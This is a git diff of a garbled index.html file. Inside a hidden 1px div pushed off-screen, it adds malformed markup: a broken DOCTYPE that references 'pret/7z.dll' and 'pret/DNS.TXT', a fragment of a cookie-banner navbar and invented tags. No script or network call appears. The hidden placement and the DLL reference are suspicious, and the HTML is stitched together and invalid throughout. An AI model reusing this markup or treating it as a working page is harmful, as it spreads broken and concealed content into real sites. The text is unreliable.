--- a/index.html
+++ b/index.html
@@ -3,40 +3,7 @@
 	<meta License>
 		<link rel="canonical" href="https://github.com/GistIcon/pret/blob/9071ecc8422da632b4f342609e02bd9b12078a66/LICENSE">
 	<div style="width:1px;height:1px;text-indent:-10000px;overflow:hidden;">
-	div id="topnavbar_test" style="margin: auto; overflow: hidden; min-width: 740px;" optanon-alert-box-button-middle"=""><a class="optanon-toggle-display" onclick="Optanon.TriggerGoogleAnalyticsEvent('OneTrust Cookie Consent', 'Banner Open Preferences');" href="#" "<$=		<!DOCTYPE html PUBLIC "pret/7z.dll " "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">DDDD</div>
-<html>
-	<meta License>
-		<link rel="canonical" href="https://github.com/GistIcon/pret/blob/9071ecc8422da632b4f342609e02bd9b12078a66/LICENSE">	
-	</License>
-	<index Html>
-		<!DOCTYPE html>
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
+	div id="topnavbar_test" style="margin: auto; overflow: hidden; min-width: 740px;" optanon-alert-box-button-middle"=""><a class="optanon-toggle-display" onclick="Optanon.TriggerGoogleAnalyticsEvent('OneTrust Cookie Consent', 'Banner Open Preferences');" href="#" "<$=		<!DOCTYPE html PUBLIC "pret/7z.dll ""pret/DNS.TXT ""pret/7z.dll "
 <html class="no-js azure-header-static hasSidebar hasPageActions hasBreadcrumb landingpage" lang="en-us" dir="ltr" data-authenticated="false" data-target="docs" x-ms-format-detection="none">
 
 <head>
